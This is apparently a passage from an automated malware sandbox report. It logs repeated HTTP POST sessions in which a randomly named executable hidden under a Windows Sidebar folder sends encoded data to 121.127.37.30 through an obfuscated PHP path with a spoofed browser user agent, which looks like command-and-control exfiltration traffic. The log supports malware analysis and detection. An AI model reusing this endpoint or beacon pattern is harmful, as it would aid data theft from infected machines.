                                                Data Ascii: URZS^ZQ^^^QWPRZYYSXH[_RY[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]9\)<2^3"4>0_(7*95?/R)W3Z*+$3"<!Y""Z)
                                                Dec 5, 2024 16:03:44.061640024 CET25INHTTP/1.1 100 Continue
                                                Dec 5, 2024 16:03:44.301774025 CET207INHTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:03:43 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Content-Length: 4
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 34 56 59 57
                                                Data Ascii: 4VYW


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                62192.168.2.749978121.127.37.30807528C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 5, 2024 16:03:44.541467905 CET447OUTPOST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Dec 5, 2024 16:03:44.893690109 CET2564OUTData Raw: 55 53 5a 5c 5b 58 51 59 5e 5e 51 57 50 52 5a 5e 59 53 58 40 5b 56 52 51 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: USZ\[XQY^^QWPRZ^YSX@[VRQ[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]:*?.0-U#'4_*;0<X)<"Y$="3Z<8_&-+!Y""Z)
                                                Dec 5, 2024 16:03:45.868026018 CET25INHTTP/1.1 100 Continue
                                                Dec 5, 2024 16:03:46.100414038 CET151INHTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:03:45 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Content-Length: 4
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 34 56 59 57
                                                Data Ascii: 4VYW


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                63192.168.2.749984121.127.37.30807528C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 5, 2024 16:03:46.339222908 CET471OUTPOST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2552
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:03:46.690880060 CET2552OUTData Raw: 50 56 5a 5b 5e 5f 54 5c 5e 5e 51 57 50 5a 5a 59 59 5d 58 43 5b 56 52 5e 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: PVZ[^_T\^^QWPZZYY]XC[VR^[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]:)/0Y2 4<]*;?+%,Y=0!<'R*1?;/3:+!Y""Z)
                                                Dec 5, 2024 16:03:47.664349079 CET25INHTTP/1.1 100 Continue
                                                Dec 5, 2024 16:03:47.896100998 CET207INHTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:03:47 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Content-Length: 4
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 34 56 59 57
                                                Data Ascii: 4VYW


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                64192.168.2.749986121.127.37.30807528C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 5, 2024 16:03:48.135384083 CET471OUTPOST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:03:48.487426043 CET2564OUTData Raw: 50 5f 5a 52 5e 59 54 5c 5e 5e 51 57 50 5f 5a 5d 59 52 58 48 5b 51 52 51 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: P_ZR^YT\^^QWP_Z]YRXH[QRQ[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]:=50<9Q 7^*;??)*'_!/'W*?((''>:?!Y""Z)1


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                65192.168.2.749991121.127.37.30807528C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 5, 2024 16:03:49.280567884 CET471OUTPOST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 1452
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:03:49.628051996 CET1452OUTData Raw: 50 53 5a 58 5e 5e 54 5a 5e 5e 51 57 50 59 5a 5f 59 54 58 49 5b 5e 52 5c 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: PSZX^^TZ^^QWPYZ_YTXI[^R\[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]:)<2$177*?))( ,;S*1<;$'*/!Y""Z))
                                                Dec 5, 2024 16:03:50.686480999 CET25INHTTP/1.1 100 Continue
                                                Dec 5, 2024 16:03:50.920602083 CET380INHTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:03:50 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Vary: Accept-Encoding
                                                Content-Length: 152
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 06 1e 23 02 20 03 2d 00 37 2a 09 52 2c 3e 0e 5b 30 30 0c 45 25 55 33 04 26 2d 1b 55 31 15 20 0a 36 2b 0a 02 22 00 30 06 20 01 27 5c 26 27 28 46 0c 1d 21 03 30 01 31 1c 2a 17 2b 0e 2d 3f 25 08 2a 33 0c 59 2d 58 21 09 29 30 2a 0b 3f 17 21 0c 26 01 3c 59 27 14 00 5c 28 33 0a 02 27 25 20 53 00 14 26 0a 2a 1f 3d 1c 2a 3f 04 01 21 5a 2f 09 28 05 2e 1d 24 2b 2e 12 26 1a 38 00 26 17 38 54 22 24 20 0c 3e 00 03 05 26 05 38 10 3d 19 26 5c 21 05 20 57 00 3d 59 56
                                                Data Ascii: # -7*R,>[00E%U3&-U1 6+"0 '\&'(F!01*+-?%*3Y-X!)0*?!&<Y'\(3'% S&*=*?!Z/(.$+.&8&8T"$ >&8=&\! W=YV


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                66192.168.2.749992121.127.37.30807528C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 5, 2024 16:03:49.401921034 CET471OUTPOST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:03:49.753077030 CET2564OUTData Raw: 50 5e 5a 5a 5b 5b 54 58 5e 5e 51 57 50 5f 5a 50 59 51 58 40 5b 57 52 5e 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: P^ZZ[[TX^^QWP_ZPYQX@[WR^[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]9])6\'Y2#4(=,+ =9; ?#T(1'Y?80\3-&(/!Y""Z)1
                                                Dec 5, 2024 16:03:50.869203091 CET25INHTTP/1.1 100 Continue
                                                Dec 5, 2024 16:03:51.108361006 CET207INHTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:03:50 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Content-Length: 4
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 34 56 59 57
                                                Data Ascii: 4VYW


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                67192.168.2.749998121.127.37.30807528C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 5, 2024 16:03:51.357625961 CET447OUTPOST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2560
                                                Expect: 100-continue
                                                Dec 5, 2024 16:03:51.706182957 CET2560OUTData Raw: 55 51 5f 5f 5b 5b 54 5f 5e 5e 51 57 50 5a 5a 50 59 5c 58 40 5b 51 52 58 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: UQ__[[T_^^QWPZZPY\X@[QRX[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]:+<*0:#$<)(;<8)#Y!>1(\3-&?!Y""Z)
                                                Dec 5, 2024 16:03:52.676578045 CET25INHTTP/1.1 100 Continue
                                                Dec 5, 2024 16:03:52.985109091 CET151INHTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:03:52 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Content-Length: 4
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 34 56 59 57
                                                Data Ascii: 4VYW


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                68192.168.2.750004121.127.37.30807528C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 5, 2024 16:03:53.233935118 CET471OUTPOST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:03:53.581221104 CET2564OUTData Raw: 50 52 5a 53 5e 5d 51 5f 5e 5e 51 57 50 5b 5a 5f 59 5c 58 40 5b 5f 52 58 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: PRZS^]Q_^^QWP[Z_Y\X@[_RX[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]9Y*.]3,"77)(<+)3!>W?[<8 ')(/!Y""Z)!
                                                Dec 5, 2024 16:03:54.595108032 CET25INHTTP/1.1 100 Continue
                                                Dec 5, 2024 16:03:54.832226992 CET207INHTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:03:54 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Content-Length: 4
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 34 56 59 57
                                                Data Ascii: 4VYW


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                69192.168.2.750010121.127.37.30807528C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 5, 2024 16:03:55.075115919 CET471OUTPOST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:03:55.424959898 CET2564OUTData Raw: 50 57 5a 5a 5e 5e 54 5a 5e 5e 51 57 50 52 5a 59 59 57 58 40 5b 57 52 5f 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: PWZZ^^TZ^^QWPRZYYWX@[WR_[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]9\)<2Y3#7$*?C$\=:<!?*+;$$!<?!Y""Z)


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                70192.168.2.750011121.127.37.30807528C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 5, 2024 16:03:56.049314976 CET471OUTPOST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 1452
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:03:56.395211935 CET1452OUTData Raw: 50 5e 5f 5e 5e 5b 54 5f 5e 5e 51 57 50 5c 5a 5e 59 54 58 40 5b 5f 52 58 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: P^_^^[T_^^QWP\Z^YTX@[_RX[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]9^>)3<177*>54[=_"/7)3Z+#$9+!Y""Z)=
                                                Dec 5, 2024 16:03:57.375293970 CET25INHTTP/1.1 100 Continue
                                                Dec 5, 2024 16:03:57.608352900 CET380INHTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:03:57 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Vary: Accept-Encoding
                                                Content-Length: 152
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 06 1e 23 01 20 2d 31 03 34 5c 30 0d 2e 00 3f 05 24 23 3e 09 26 33 20 59 31 13 31 1d 25 28 27 1b 36 05 09 5c 36 07 23 59 20 3c 20 05 26 27 28 46 0c 1d 22 5f 33 3b 26 0d 2a 39 2f 08 38 2c 0c 1b 2a 1d 21 00 39 3e 0b 0d 3f 33 36 0f 3f 39 03 0c 32 28 2f 01 27 2a 07 02 28 23 2c 00 24 1f 20 53 00 14 25 16 29 32 35 57 3e 01 25 10 21 2c 2c 12 28 38 3a 58 25 5d 21 0d 26 34 3c 06 27 2a 38 1c 23 51 23 1f 3d 58 2d 05 25 3c 2c 5c 3d 33 26 5c 21 05 20 57 00 3d 59 56
                                                Data Ascii: # -14\0.?$#>&3 Y11%('6\6#Y < &'(F"_3;&*9/8,*!9>?36?92(/'*(#,$ S%)25W>%!,,(8:X%]!&4<'*8#Q#=X-%<,\=3&\! W=YV


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                71192.168.2.750012121.127.37.30807528C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 5, 2024 16:03:56.169380903 CET471OUTPOST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:03:56.519203901 CET2564OUTData Raw: 50 5e 5f 59 5e 5e 54 5a 5e 5e 51 57 50 5c 5a 5a 59 57 58 42 5b 5f 52 5a 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: P^_Y^^TZ^^QWP\ZZYWXB[_RZ[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]9)Y)$/:47$=<\>68+:+[ ?R><83'[%+?!Y""Z)=
                                                Dec 5, 2024 16:03:57.500520945 CET25INHTTP/1.1 100 Continue
                                                Dec 5, 2024 16:03:57.736330986 CET207INHTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:03:57 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Content-Length: 4
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 34 56 59 57
                                                Data Ascii: 4VYW


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                72192.168.2.750018121.127.37.30807528C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 5, 2024 16:03:57.984463930 CET447OUTPOST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Dec 5, 2024 16:03:58.331367970 CET2564OUTData Raw: 50 56 5a 53 5e 5a 54 53 5e 5e 51 57 50 59 5a 5f 59 51 58 45 5b 53 52 51 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: PVZS^ZTS^^QWPYZ_YQXE[SRQ[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]9]*<-3? '*8$?4Y=986((2++^<_05S<!Y""Z))
                                                Dec 5, 2024 16:03:59.305738926 CET25INHTTP/1.1 100 Continue
                                                Dec 5, 2024 16:03:59.543287992 CET151INHTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:03:59 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Content-Length: 4
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 34 56 59 57
                                                Data Ascii: 4VYW


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                73192.168.2.750024121.127.37.30807528C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 5, 2024 16:03:59.795341015 CET471OUTPOST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:04:00.145144939 CET2564OUTData Raw: 50 54 5a 58 5e 58 51 5e 5e 5e 51 57 50 52 5a 50 59 53 58 48 5b 5f 52 58 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: PTZX^XQ^^^QWPRZPYSXH[_RX[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]9X)/'*#(X)/+%]+)Y6#T)"??8/'2(?!Y""Z)
                                                Dec 5, 2024 16:04:01.242125034 CET25INHTTP/1.1 100 Continue
                                                Dec 5, 2024 16:04:01.476268053 CET207INHTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:04:01 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Content-Length: 4
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 34 56 59 57
                                                Data Ascii: 4VYW


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                74192.168.2.750029121.127.37.30807528C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 5, 2024 16:04:01.713241100 CET471OUTPOST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Connection: Keep-Alive
